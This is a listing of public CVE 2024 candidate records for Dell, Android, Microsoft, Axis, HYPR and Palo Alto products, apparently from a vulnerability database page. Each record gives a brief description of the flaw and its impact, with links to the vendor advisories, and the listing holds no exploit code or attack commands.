CVE 2024 166 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_tcpdump utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands with elevated privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 165 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_acldb_dump utility. An authenticated attacker could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 164 Candidate Dell Unity, versions prior to 5.4, contain an OS Command Injection Vulnerability in its svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary commands with elevated privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 163 Candidate Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain a TOCTOU race condition vulnerability. A local low privileged attacker could potentially exploit this vulnerability to gain access to otherwise unauthorized resources. MISC:https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222756/dsa-2024-003-security-update-for-dell-poweredge-server-bios-for-a-time-of-check-time-of-use-toctou-vulnerability Assigned (20231214)
CVE 2024 162 Candidate Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to out-of-bound read/writes to SMRAM. MISC:https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability Assigned (20231214)
CVE 2024 161 Candidate Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to arbitrary writes to SMRAM. MISC:https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability Assigned (20231214)
CVE 2024 156 Candidate Dell Digital Delivery, versions prior to 5.0.86.0, contain a Buffer Overflow vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to arbitrary code execution and/or privilege escalation. MISC:https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability Assigned (20231214)
CVE 2024 155 Candidate Dell Digital Delivery, versions prior to 5.0.86.0, contain a Use After Free Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to an application crash or execution of arbitrary code. MISC:https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033 | URL:https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033 Assigned (20231214)
CVE 2024 68 Candidate Improper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on MacOS allows File Manipulation.This issue affects Workforce Access: before 8.7.1. MISC:https://www.hypr.com/trust-center/security-advisories | URL:https://www.hypr.com/trust-center/security-advisories Assigned (20231127)
CVE 2024 57 Candidate NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability MISC:NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057 | MISC:https://security.netapp.com/advisory/ntap-20240208-0007/ | URL:https://security.netapp.com/advisory/ntap-20240208-0007/ Assigned (20231122)
CVE 2024 56 Candidate Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability MISC:Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0056 Assigned (20231122)
CVE 2024 55 Candidate Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs mediaclip.cgi and playclip.cgi was vulnerable for file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. MISC:https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf | URL:https://www.axis.com/dam/public/c4/00/c5/cve-2024-0055-en-US-432117.pdf Assigned (20231121)
CVE 2024 54 Candidate Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs local_list.cgi, create_overlay.cgi and irissetup.cgi was vulnerable for file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. MISC:https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf | URL:https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf Assigned (20231121)
CVE 2024 53 Candidate In getCustomPrinterIcon of PrintManagerService.java, there is a possible way to view other user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77 | URL:https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77 | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 52 Candidate In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04 | URL:https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04 | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 51 Candidate In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e | URL:https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 50 Candidate In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check. This could lead to a local non-security issue with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d | URL:https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 49 Candidate In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e | URL:https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 48 Candidate In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede | URL:https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 47 Candidate In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code. This could lead to local denial of service when policies are deserialized on reboot with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1 | URL:https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1 | MISC:https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17 | URL:https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17 | MISC:https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb | URL:https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 46 Candidate In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c | URL:https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 45 Candidate In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9 | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 44 Candidate In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792 | URL:https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792 | MISC:https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2 | URL:https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2 | MISC:https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html | URL:https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 41 Candidate In removePersistentDot of SystemStatusAnimationSchedulerImpl.kt, there is a possible race condition due to a logic error in the code. This could lead to local escalation of privilege that fails to remove the persistent dot with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26 | URL:https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 40 Candidate In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864 | URL:https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 39 Candidate In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9 | MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8 | MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3 | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20231116)
CVE 2024 38 Candidate In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079 | URL:https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 37 Candidate In applyCustomDescription of SaveUi.java, there is a possible way to view images belonging to a different user due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931 | URL:https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 36 Candidate In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e | URL:https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 35 Candidate In onNullBinding of TileLifecycleManager.java, there is a possible way to launch an activity from the background due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4 | URL:https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 34 Candidate In BackgroundLaunchProcessController, there is a possible way to launch arbitrary activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6 | URL:https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 33 Candidate In multiple functions of ashmem-dev.cpp, there is a possible missing seal due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193 | URL:https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193 | MISC:https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229 | URL:https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 32 Candidate In queryChildDocuments of FileSystemProvider.java, there is a possible way to request access to directories that should be hidden due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7 | URL:https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7 | MISC:https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394 | URL:https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 31 Candidate In attp_build_read_by_type_value_cmd of att_protocol.cc , there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661 | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 30 Candidate In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 29 Candidate In multiple files, there is a possible way to capture the device screen when disallowed by device policy due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad | URL:https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad | MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 23 Candidate In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268 | URL:https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 21 Candidate In onCreate of NotificationAccessConfirmationActivity.java, there is a possible way for an app in the work profile to enable notification listener services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. MISC:https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1 | URL:https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 20 Candidate In onActivityResult of NotificationSoundPreference.java, there is a possible way to hear audio files belonging to a different user due to a confused deputy. This could lead to local information disclosure across users of a device with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1 | URL:https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 19 Candidate In setListening of AppOpsControllerImpl.java, there is a possible way to hide the microphone privacy indicator when restarting systemUI due to a missing check for active recordings. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a | URL:https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 18 Candidate In convertYUV420Planar16ToY410 of ColorConverter.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23 | URL:https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 17 Candidate In shouldUseNoOpLocation of CameraActivity.java, there is a possible confused deputy due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. MISC:https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e | URL:https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 16 Candidate In multiple locations, there is a possible out of bounds read due to a missing bounds check. This could lead to paired device information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 15 Candidate In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70 | URL:https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70 | MISC:https://source.android.com/security/bulletin/2024-01-01 | URL:https://source.android.com/security/bulletin/2024-01-01 Assigned (20231116)
CVE 2024 14 Candidate In startInstall of UpdateFetcher.java, there is a possible way to trigger a malicious config update due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/2024-02-01 | URL:https://source.android.com/security/bulletin/2024-02-01 Assigned (20231116)
CVE 2024 11 Candidate A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft. MISC:https://security.paloaltonetworks.com/CVE-2024-0011 | URL:https://security.paloaltonetworks.com/CVE-2024-0011 Assigned (20231109)
CVE 2024 10 Candidate A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of a user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft. MISC:https://security.paloaltonetworks.com/CVE-2024-0010 | URL:https://security.paloaltonetworks.com/CVE-2024-0010 Assigned (20231109)
CVE 2024 9 Candidate An improper verification vulnerability in the GlobalProtect gateway feature of Palo Alto Networks PAN-OS software enables a malicious user with stolen credentials to establish a VPN connection from an unauthorized IP address. MISC:https://security.paloaltonetworks.com/CVE-2024-0009 | URL:https://security.paloaltonetworks.com/CVE-2024-0009 Assigned (20231109)
CVE 2024 8 Candidate Web sessions in the management interface in Palo Alto Networks PAN-OS software do not expire in certain situations, making it susceptible to unauthorized access. MISC:https://security.paloaltonetworks.com/CVE-2024-0008 | URL:https://security.paloaltonetworks.com/CVE-2024-0008 Assigned (20231109)
CVE 2024 7 Candidate A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface on Panorama appliances. This enables the impersonation of another authenticated administrator. MISC:https://security.paloaltonetworks.com/CVE-2024-0007 | URL:https://security.paloaltonetworks.com/CVE-2024-0007 Assigned (20231109)
©Copyright. All rights reserved.
We need your consent to load the translations
We use a third-party service to translate the website content that may collect data about your activity. Please review the details in the privacy policy and accept the service to view the translations.